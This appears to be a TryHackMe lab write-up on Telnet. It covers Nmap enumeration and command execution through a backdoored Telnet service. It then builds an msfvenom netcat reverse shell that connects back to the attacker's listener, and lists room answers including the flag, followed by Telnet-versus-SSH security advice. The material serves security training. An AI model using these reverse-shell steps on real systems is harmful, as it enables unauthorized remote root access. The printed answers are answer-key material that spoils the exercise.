This article is a deep dive into Telnet, covering enumeration, exploitation, penetration testing and security concerns related to this protocol. This article is part of COMPTIA Pentest+ track on TryHackMe.

๐Ÿ”น What is Telnet?

Everything transmitted over Telnet is in plain text, making it vulnerable to interception and exploitation.

Telnet is an application-layer protocol used for remote communication with a server.

It has been replaced by SSH due to lack of encryption, making it insecure.

๐Ÿ”น Enumerating Telnet (Finding It on a Target System)

The video demonstrates using Nmap to scan for Telnet:

nmap -A -p- <target-ip>
  • The scan revealed port 8012 open, which is an unassigned port.
  • Further analysis showed a backdoor named “Skiddy”, indicating potential unauthorized access.

To manually test the port:

telnet <target-ip> 8012

If the connection is successful, the port is actively running Telnet.

๐Ÿ”น Exploiting Telnet

Step 1: Checking for Command Execution

Since the Telnet server didn’t display a help menu, the attacker tried executing a command:

.run ping <attacker-ip> -c 5

On the attacker’s side, they listened for ICMP (ping) requests:

tcpdump -i tun0 icmp
  • Receiving the pings confirmed command execution was possible.

Step 2: Gaining a Reverse Shell

To get full access to the system, they created a malicious payload:

msfvenom -p cmd/unix/reverse_netcat lhost=<attacker-ip> lport=4545 R

Then, they set up a Netcat listener:

nc -lvp 4545

Executing the payload through the Telnet session granted root access.

Packet Sniffing with tcpdump

We can also up a listener using tcpdump to monitor ICMP (ping) traffic from the target machine.

The intercepted packets prove that commands sent over Telnet are transmitted in clear text, making them easy targets for attackers.

The attack is refined further by intercepting additional network traffic, showcasing the risks of unencrypted communications.

Privilege Escalation Considerations

  • In real-world scenarios, attackers may not immediately obtain root privileges.
  • They typically start as a low-privileged user and then escalate privileges using known exploits or misconfigurations.
  • Common privilege escalation techniques include:
    • Exploiting SUID binaries
    • Finding misconfigured cron jobs
    • Searching for stored passwords in configuration files

Security Implications of Using Telnet

Enforce strong authentication mechanisms.

The instructor emphasizes the risks of using Telnet, including:

Lack of encryption โ€“ All data, including passwords, is transmitted in plaintext.

Susceptibility to MITM (Man-in-the-Middle) attacks โ€“ Attackers can easily intercept communication.

Backdoor access โ€“ As demonstrated, unsecured Telnet services can be hijacked by attackers.

To mitigate these risks, administrators should:

Disable Telnet and use SSH instead.

Use firewalls to block unnecessary services.

How SSH Replaced Telnet

Telnetโ€™s biggest flaw is that it transmits data in plain text. This means:
Usernames & passwords are unencrypted โ†’ Anyone on the network can intercept and steal credentials.
Commands are visible โ†’ Hackers can see everything being typed.
Man-in-the-middle (MITM) attacks โ†’ Attackers can alter commands before they reach the server.

This made Telnet an easy target for sniffing attacks, where hackers capture network traffic to extract credentials.

๐Ÿ”น SSH: The Secure Alternative

SSH (Secure Shell) was introduced in 1995 to fix these security issues.

โœ… Encrypts all communication using strong cryptographic algorithms.
โœ… Uses public-key authentication (optional) instead of just passwords.
โœ… Protects against MITM attacks by verifying the server’s identity.
โœ… Supports tunneling for secure file transfers (e.g., SCP, SFTP).

Example of an SSH login:

ssh user@remote-server.com

This is much safer than:

telnet remote-server.com

๐Ÿ”น How SSH Works (Simplified)

1๏ธโƒฃ Handshake: The client and server exchange encryption keys.
2๏ธโƒฃ Authentication: The user logs in using a password or an SSH key.
3๏ธโƒฃ Encrypted Session: All commands and data are securely transmitted.

With Telnet, everything is exposed. With SSH, everything is protected.

TryHackMe Networking Core Protocols | Room Answers

Okay, let’s try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.

No answer needed

Great! It’s an open telnet connection! What welcome message do we receive?

SKIDY’S BACKDOOR.

Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

N

Hmmโ€ฆ that’s strange. Let’s check to see if what we’re typing is being executed as a system command.

No answer needed

Start a tcpdump listener on your local machine.

If using your own machine with the OpenVPN connection, use:

sudo tcpdump ip proto \icmp -i tun0
If using the AttackBox, use:

sudo tcpdump ip proto \icmp -i ens5
This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

No answer needed

Now, use the command “ping [local THM ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

Y

Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let’s have some fun!

No answer needed

We’re going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here’s our syntax:

“msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R”

-p = payload
lhost = our local host IP address (this is your machine’s IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

What word does the generated payload start with?

mkfifo

Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

“nc -lvnp [listening port]”

What would the command look like for the listening port we selected in our payload?

nc -lvnp 4444

Great! Now that’s running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!

No answer needed

Success! What is the contents of flag.txt?

THM{y0u_g0t_th3_t3ln3t_fl4g}

Video Walkthrough

, ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles